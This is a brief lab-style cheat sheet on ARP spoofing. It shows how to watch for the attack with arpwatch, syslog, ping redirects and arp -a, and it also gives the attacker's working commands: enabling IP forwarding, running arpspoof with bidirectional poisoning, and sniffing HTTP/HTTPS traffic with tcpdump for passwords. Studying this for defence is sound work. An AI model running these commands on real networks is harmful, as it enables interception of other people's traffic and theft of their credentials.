How to ARP SPOOFING & watch/prevent

How to ARP SPOOFING & watch/prevent

Victim: Install arpwatch to monitor arp events

# On Victim:
apt install arpwatch
systemctl start arpwatch@eth0 # get with ip link

# Start logging:
tail /var/log/syslog -f | grep arpwatch

Attacker: Install tcpdump and arpspoof

apt install dsniff tcpdump

# Act as Proxy:
# fragrouter -B1
sysctl net.ipv4.conf.eth0.forwarding=1

arpspoof -i eth0 -c own -r -t <VICTIMIP> <ROUTERIP>
# -r means bidirectional poisoning!

tcpdump -i eth0 icmp
# Sniff some pw's on http/s traffic
# tshark -i ath0 -x -Y "http.request" dst host IPROUTER and dst port 80
tcpdump -A src <VICTIMIP> and '(tcp port 80) or (tcp port 443)'

Find malicious redirects on Victim side:

# ping 1.1.1.1            
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
From ATTACKER: icmp_seq=1 Redirect Host(New nexthop: ROUTER)
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=14.4 ms

# arp -a
ROUTER IP = ATTACKER MAC
show "new station" and "flipflop" high events here: no sendmail atm installed. which sendmail || echo "No MTA installed"